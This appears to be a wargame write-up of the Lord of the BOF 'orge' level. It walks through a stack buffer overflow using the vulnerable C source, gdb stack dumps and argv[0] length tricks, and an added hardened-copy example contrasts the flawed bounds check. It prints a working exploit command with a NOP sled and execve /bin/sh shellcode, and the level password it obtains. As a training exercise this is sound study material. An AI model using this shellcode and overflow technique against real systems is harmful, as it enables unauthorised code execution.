[LOB] darkelf → orge

ruming 2021. 2. 22. 20:15

Log in as darkelf / kernel crashed

bash2

orge.c

[darkelf@localhost darkelf]$ cat orge.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - orge
        - check argv[0]
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, strcpy, memset */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // here is changed!
        if(strlen(argv[0]) != 77){
                printf("argv[0] error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}

The conditions are the same as in the previous problem, with this part added:

// here is changed!
if(strlen(argv[0]) != 77){
        printf("argv[0] error\n");
        exit(0);
}
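As an added example (not from the LOB challenge source or this post), the C program below contrasts the orge.c length check with a bound derived from the destination buffer size; BUF_SIZE, copy_arg, accepts_len and bytes_past_buffer are names chosen here, and the stack layout it describes is the one read off the disassembly further down.

```c
#include <stdio.h>
#include <string.h>
/* Added example, not part of orge.c. The challenge guards a 40-byte buffer
 * with "strlen(argv[1]) > 48", so 41..48 bytes are still copied. Per the
 * disassembly (lea eax,[ebp-40]) the saved EBP and return address sit right
 * above buffer, so the 8 surplus bytes land there, which is why the check
 * wants argv[1][47] == 0xbf, the high byte of a stack address. */
#define BUF_SIZE 40

/* The challenge's check: is an argument of length n copied at all? */
int orge_check_accepts(size_t n) { return n <= 48; }

/* Bytes of an accepted argument that land past buffer[BUF_SIZE]:
 * 48 -> 8 (4 bytes saved EBP + 4 bytes return address). */
size_t bytes_past_buffer(size_t n)
{
    return (orge_check_accepts(n) && n > BUF_SIZE) ? n - BUF_SIZE : 0;
}

/* Hardened copy: succeed only if src plus its NUL fits in dst[dst_size].
 * Returns 0 on success, -1 when the input would overflow. */
int copy_arg(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len >= dst_size)        /* no room for the terminator */
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Test helper: is an argument of n 'A's accepted and copied intact? */
int accepts_len(size_t n)
{
    char src[128], buffer[BUF_SIZE];
    if (n >= sizeof src)
        return 0;
    memset(src, 'A', n);
    src[n] = '\0';
    return copy_arg(buffer, sizeof buffer, src) == 0 && strcmp(buffer, src) == 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];
    if (argc < 2 || copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
        puts("argv error or argument is too long!");
        return 1;
    }
    puts(buffer);
    return 0;
}
```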

argv[0] would be the ./orge part, and I didn't know how to make it 77 bytes, so I looked it up.

Either use a symbolic link or add extra / characters (apparently it doesn't matter how many / there are).

I used the following method. When I tested it, argv[0] error did not appear.

[darkelf@localhost darkelf]$ `python -c 'print "./"+"/"*71+"orge"'` hello
stack is still your friend.

I started gdb with orge2, but since I didn't know how to match the argv[0] length, I renamed it to A*77 and ran it again.

[darkelf@localhost darkelf]$ rename orge2 `python -c 'print "A"*77'` orge2
[darkelf@localhost darkelf]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
orge
orge.c
[darkelf@localhost darkelf]$ gdb -q `python -c 'print "A"*77'`
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
...
0x80485dd <main+221>:   mov    %edx,DWORD PTR [%eax]
0x80485df <main+223>:   push   %edx
0x80485e0 <main+224>:   call   0x80483f0 <strlen>
0x80485e5 <main+229>:   add    %esp,4
0x80485e8 <main+232>:   mov    %eax,%eax
0x80485ea <main+234>:   cmp    %eax,48
0x80485ed <main+237>:   jbe    0x8048606 <main+262>
0x80485ef <main+239>:   push   0x80486c8
0x80485f4 <main+244>:   call   0x8048410 <printf>
0x80485f9 <main+249>:   add    %esp,4
0x80485fc <main+252>:   push   0
0x80485fe <main+254>:   call   0x8048420 <exit>
0x8048603 <main+259>:   add    %esp,4
0x8048606 <main+262>:   mov    %eax,DWORD PTR [%ebp+12]
0x8048609 <main+265>:   add    %eax,4
0x804860c <main+268>:   mov    %edx,DWORD PTR [%eax]
0x804860e <main+270>:   push   %edx
0x804860f <main+271>:   lea    %eax,[%ebp-40]
0x8048612 <main+274>:   push   %eax
0x8048613 <main+275>:   call   0x8048440 <strcpy>
0x8048618 <main+280>:   add    %esp,8
0x804861b <main+283>:   lea    %eax,[%ebp-40]
0x804861e <main+286>:   push   %eax
---Type <return> to continue, or q <return> to quit---
0x804861f <main+287>:   push   0x80486df
0x8048624 <main+292>:   call   0x8048410 <printf>
0x8048629 <main+297>:   add    %esp,8
0x804862c <main+300>:   push   40
0x804862e <main+302>:   push   0
0x8048630 <main+304>:   lea    %eax,[%ebp-40]
0x8048633 <main+307>:   push   %eax
0x8048634 <main+308>:   call   0x8048430 <memset>
0x8048639 <main+313>:   add    %esp,12
0x804863c <main+316>:   leave
0x804863d <main+317>:   ret
0x804863e <main+318>:   nop
0x804863f <main+319>:   nop
End of assembler dump.

I'll set a breakpoint at main+280.

As I was about to run it, I realized I had renamed it wrong. Since it is executed as /home/darkelf/name when run, I saved it again as A's with 13 bytes taken off. I restarted gdb and ran it with arguments that satisfy the conditions.

(gdb) r `python -c 'print "\xbf"*48'` `python -c 'print "B"*100'`
Starting program: /home/darkelf/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAA `python -c 'print "\xbf"*48'` `python -c 'print "B"*100'`

Breakpoint 1, 0x8048618 in main ()

(gdb) x/200x $esp
0xbffff9d4:     0xbffff9e0      0xbffffba1      0x00000015      0xbfbfbfbf
0xbffff9e4:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffff9f4:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffa04:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0x00000000
0xbffffa14:     0xbffffa54      0xbffffa64      0x40013868      0x00000003
0xbffffa24:     0x08048450      0x00000000      0x08048471      0x08048500
0xbffffa34:     0x00000003      0xbffffa54      0x08048390      0x0804866c
0xbffffa44:     0x4000ae60      0xbffffa4c      0x40013e90      0x00000003
0xbffffa54:     0xbffffb53      0xbffffba1      0xbffffbd2      0x00000000
0xbffffa64:     0xbffffc37      0xbffffc59      0xbffffc63      0xbffffc71
0xbffffa74:     0xbffffc90      0xbffffca0      0xbffffcb9      0xbffffcd6
0xbffffa84:     0xbffffcf5      0xbffffd00      0xbffffd0e      0xbffffd51
0xbffffa94:     0xbffffd64      0xbffffd79      0xbffffd89      0xbffffd96
0xbffffaa4:     0xbffffdb5      0xbffffdc0      0xbffffdd1      0xbffffde3
0xbffffab4:     0xbffffdeb      0x00000000      0x00000003      0x08048034
0xbffffac4:     0x00000004      0x00000020      0x00000005      0x00000006
0xbffffad4:     0x00000006      0x00001000      0x00000007      0x40000000
0xbffffae4:     0x00000008      0x00000000      0x00000009      0x08048450
0xbffffaf4:     0x0000000b      0x000001fa      0x0000000c      0x000001fa
0xbffffb04:     0x0000000d      0x000001fa      0x0000000e      0x000001fa
0xbffffb14:     0x00000010      0x0f8bfbff      0x0000000f      0xbffffb4e
0xbffffb24:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb34:     0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffb44:     0x00000000      0x00000000      0x36690000      0x2f003638
0xbffffb54:     0x656d6f68      0x7261642f      0x666c656b      0x4141412f
0xbffffb64:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffb74:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffb84:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffb94:     0x41414141      0x41414141      0x41414141      0xbfbfbf00
0xbffffba4:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffbb4:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffbc4:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0x424200bf
0xbffffbd4:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffbe4:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffbf4:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffc04:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffc14:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffc24:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffc34:     0x00004242      0x00000000      0x00000000      0x00000000
0xbffffc44:     0x00000000      0x00000000      0x00000000      0x00000000
...

I'll use the address 0xbffffc04.

`python -c 'print "."+"/"*72+"orge"'` `python -c 'print "A"*44+"\x04\xfc\xff\xbf "+"\x90"*10000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

After repeated failures, I decided to just create a symbolic link.

ln -s orge `python -c 'print "A"*75'`

Matching the conditions again, I put the NOPs and shellcode into argv[2].

`python -c 'print "./"+"B"*75'` `python -c 'print "A"*47+"\xbf "+"\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

Segmentation fault (core dumped)

Core analysis

[darkelf@localhost darkelf]$ gdb -c core -q
Core was generated by `./BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB A'.
Program terminated with signal 11, Segmentation fault.
#0  0xbf414141 in ?? ()
(gdb) x/200x $esp
0xbffff630:     0x00000000      0xbffff674      0xbffff684      0x40013868
0xbffff640:     0x00000003      0x08048450      0x00000000      0x08048471
0xbffff650:     0x08048500      0x00000003      0xbffff674      0x08048390
0xbffff660:     0x0804866c      0x4000ae60      0xbffff66c      0x40013e90
0xbffff670:     0x00000003      0xbffff766      0xbffff7b4      0xbffff7e5
0xbffff680:     0x00000000      0xbffffbe7      0xbffffbf9      0xbffffc12
0xbffff690:     0xbffffc31      0xbffffc53      0xbffffc60      0xbffffe23
0xbffff6a0:     0xbffffe42      0xbffffe5f      0xbffffe74      0xbffffe93
0xbffff6b0:     0xbffffe9e      0xbffffeae      0xbffffeb6      0xbffffec0
0xbffff6c0:     0xbffffed0      0xbffffede      0xbffffeec      0xbffffefd
0xbffff6d0:     0xbfffff08      0xbfffff1b      0xbfffff5e      0x00000000
0xbffff6e0:     0x00000003      0x08048034      0x00000004      0x00000020
0xbffff6f0:     0x00000005      0x00000006      0x00000006      0x00001000
0xbffff700:     0x00000007      0x40000000      0x00000008      0x00000000
0xbffff710:     0x00000009      0x08048450      0x0000000b      0x000001fa
0xbffff720:     0x0000000c      0x000001fa      0x0000000d      0x000001fa
0xbffff730:     0x0000000e      0x000001fa      0x00000010      0x0f8bfbff
0xbffff740:     0x0000000f      0xbffff761      0x00000000      0x00000000
0xbffff750:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff760:     0x38366900      0x2f2e0036      0x42424242      0x42424242
0xbffff770:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffff780:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffff790:     0x42424242      0x42424242      0x42424242      0x42424242
---Type <return> to continue, or q <return> to quit---
0xbffff7a0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffff7b0:     0x00424242      0x41414141      0x41414141      0x41414141
0xbffff7c0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7d0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7e0:     0xbf414141      0x90909000      0x90909090      0x90909090
0xbffff7f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff800:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff810:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff820:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff830:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff840:     0x90909090      0x90909090      0x90909090      0x90909090
...

I'll try 0xbffff830, one of the addresses that hold NOPs.

dummy(44) + NOP address + nop(1000) + shellcode

[darkelf@localhost darkelf]$ `python -c 'print "./"+"A"*75'` `python -c 'print "A"*44+"\x30\xf8\xff\xbf "+"\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0??
bash$ my-pass
euid = 507
timewalker

The attack finally succeeded!!!

timewalker
